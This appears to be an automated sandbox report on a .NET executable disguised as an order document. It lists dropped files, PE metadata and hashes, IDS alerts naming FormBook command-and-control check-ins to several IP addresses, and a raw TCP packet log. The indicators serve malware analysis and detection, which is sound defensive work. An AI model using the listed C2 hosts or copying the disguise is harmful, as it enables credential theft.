                                                                                          Size (bytes):1172
                                                                                          Entropy (8bit):5.356731422178564
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
                                                                                          MD5:68CB8F49FDE7FC3DF6CEE19CB730C7F8
                                                                                          SHA1:1EC425657E358C85CA4A3A04E6525E29B59FCB16
                                                                                          SHA-256:5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
                                                                                          SHA-512:D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                          C:\Users\user\AppData\Local\Temp\D7825j9

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\Utilman.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1239949490932863
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg0wlaew.2sd.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lcoaqrnc.gs0.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m21txumm.dqw.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw4ynfil.5sr.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.748224897787411
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:ORDER REF 47896798 PSMCO.exe
                                                                                          File size:882'688 bytes
                                                                                          MD5:fa117772a94f43197a4632f47e78a56d
                                                                                          SHA1:717e83a352d1b81e9d5e3178f7d008c64a5e5efc
                                                                                          SHA256:51c1cf58f48a4cdad053a881d872925ec79a5a72f07d67a9b79bb13abaf636d3
                                                                                          SHA512:8e4f031addb61c2fb4746a23413c396360b4f6ff7030a389b1b7a028aad6881b5b8d40d25b2e6b01c86035385936177b5f88d02d38abf059d6712e413127513d
                                                                                          SSDEEP:12288:kbq4E6mfJiLl9bWcbQkpClSdyP19Xt0SEynFLmEsVS6V6nmpA/mkZR2kUb0gNHbv:2EkDppClbP2dyFLNoS6VpsR2kUhHbv
                                                                                          TLSH:8F1501483315DA05D4A24BB069B0F7F423759E8DA512D303AEE9BCFFBC3A3416D19296
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.}g..............0..V... ......^u... ........@.. ....................................`................................

                                                                                          File Icon

                                                                                          Icon Hash:80acdadaaaa4c6ba

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4d755e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x677DD731 [Wed Jan 8 01:38:57 2025 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd750c0x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd80000x1d84.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xd55640xd56003427cbcd3525d89d167a38d57f8c39dfFalse0.9026847173403633data7.753164497880348IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xd80000x1d840x1e00c1d941e2a4b99ff451f922995842c18cFalse0.85703125data7.394882686613583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xda0000xc0x20051258e4941a73e8853b04983bb5d1cc2False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0xd80c80x1967PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9407965554359526
                                                                                          RT_GROUP_ICON0xd9a400x14data1.05
                                                                                          RT_VERSION0xd9a640x31cdata0.43844221105527637

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-08T14:59:34.664991+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649843192.186.58.3180TCP
                                                                                          2025-01-08T14:59:52.191623+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649955154.213.39.6680TCP
                                                                                          2025-01-08T14:59:54.737892+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649971154.213.39.6680TCP
                                                                                          2025-01-08T14:59:57.587982+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649979154.213.39.6680TCP
                                                                                          2025-01-08T15:00:00.156795+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649980154.213.39.6680TCP
                                                                                          2025-01-08T15:00:06.710081+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998147.83.1.9080TCP
                                                                                          2025-01-08T15:00:09.257176+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998247.83.1.9080TCP
                                                                                          2025-01-08T15:00:11.803811+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998347.83.1.9080TCP
                                                                                          2025-01-08T15:00:14.452661+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64998447.83.1.9080TCP
                                                                                          2025-01-08T15:00:20.490072+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649985104.21.53.16880TCP
                                                                                          2025-01-08T15:00:23.116674+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649986104.21.53.16880TCP
                                                                                          2025-01-08T15:00:25.668710+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649987104.21.53.16880TCP
                                                                                          2025-01-08T15:00:28.199834+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649988104.21.53.16880TCP
                                                                                          2025-01-08T15:00:41.857618+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989199.59.243.22880TCP
                                                                                          2025-01-08T15:00:44.388284+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990199.59.243.22880TCP
                                                                                          2025-01-08T15:00:46.931953+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991199.59.243.22880TCP
                                                                                          2025-01-08T15:00:49.482147+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649992199.59.243.22880TCP
                                                                                          2025-01-08T15:01:03.479513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993194.58.112.17480TCP
                                                                                          2025-01-08T15:01:06.408818+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994194.58.112.17480TCP
                                                                                          2025-01-08T15:01:09.002599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995194.58.112.17480TCP
                                                                                          2025-01-08T15:01:11.571070+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649996194.58.112.17480TCP
                                                                                          2025-01-08T15:01:17.211294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997199.192.21.16980TCP
                                                                                          2025-01-08T15:01:19.775685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998199.192.21.16980TCP
                                                                                          2025-01-08T15:01:23.191761+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999199.192.21.16980TCP
                                                                                          2025-01-08T15:01:24.877969+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000199.192.21.16980TCP
                                                                                          2025-01-08T15:01:30.427968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001192.64.119.10980TCP
                                                                                          2025-01-08T15:01:32.966574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002192.64.119.10980TCP
                                                                                          2025-01-08T15:01:35.619610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003192.64.119.10980TCP
                                                                                          2025-01-08T15:01:38.065872+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004192.64.119.10980TCP
                                                                                          2025-01-08T15:01:43.592669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000513.248.169.4880TCP
                                                                                          2025-01-08T15:01:47.179389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000613.248.169.4880TCP
                                                                                          2025-01-08T15:01:49.741610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000713.248.169.4880TCP
                                                                                          2025-01-08T15:01:52.254607+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000813.248.169.4880TCP
                                                                                          2025-01-08T15:02:00.153796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009103.247.11.20480TCP
                                                                                          2025-01-08T15:02:02.760546+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010103.247.11.20480TCP
                                                                                          2025-01-08T15:02:05.517448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011103.247.11.20480TCP
                                                                                          2025-01-08T15:02:08.109441+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012103.247.11.20480TCP
                                                                                          2025-01-08T15:02:49.664886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013192.186.58.3180TCP
                                                                                          2025-01-08T15:02:56.720351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650014154.213.39.6680TCP
                                                                                          2025-01-08T15:02:59.365461+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650015154.213.39.6680TCP
                                                                                          2025-01-08T15:03:02.605311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016154.213.39.6680TCP
                                                                                          2025-01-08T15:03:04.648395+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650017154.213.39.6680TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 8, 2025 14:59:33.649661064 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:33.654405117 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:33.654474020 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:33.664927959 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:33.669687033 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664870977 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664912939 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664928913 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664942980 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664988995 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.664990902 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.664999962 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.665014982 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.665076017 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.665087938 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.665098906 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.665106058 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.665139914 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.669831991 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.669845104 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.669899940 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.669914007 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.709871054 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.755634069 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.755646944 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.755769014 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.869410992 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869434118 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869446993 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869612932 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.869628906 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869651079 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869663000 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869679928 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.869713068 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.869736910 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869749069 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.869796038 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.870523930 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870568991 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870610952 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.870786905 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870799065 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870810986 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870830059 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870837927 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.870842934 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.870877028 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.871571064 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.871597052 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.871607065 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.871608973 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.871645927 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.871650934 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.871665001 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.871705055 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.872423887 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.872435093 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.872447014 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.872478008 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.913042068 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.919853926 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.919864893 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.920003891 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:34.960019112 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.960030079 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:34.960185051 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:35.074326038 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074361086 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074373007 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074384928 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074520111 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:35.074594021 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074606895 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074619055 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074636936 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074644089 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.074661970 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:35.074682951 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:35.075176001 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075189114 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075198889 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075220108 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075231075 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075237036 CET4984380192.168.2.6192.186.58.31
                                                                                          Jan 8, 2025 14:59:35.075243950 CET8049843192.186.58.31192.168.2.6
                                                                                          Jan 8, 2025 14:59:35.075258970 CET4984380192.168.2.6192.186.58.31
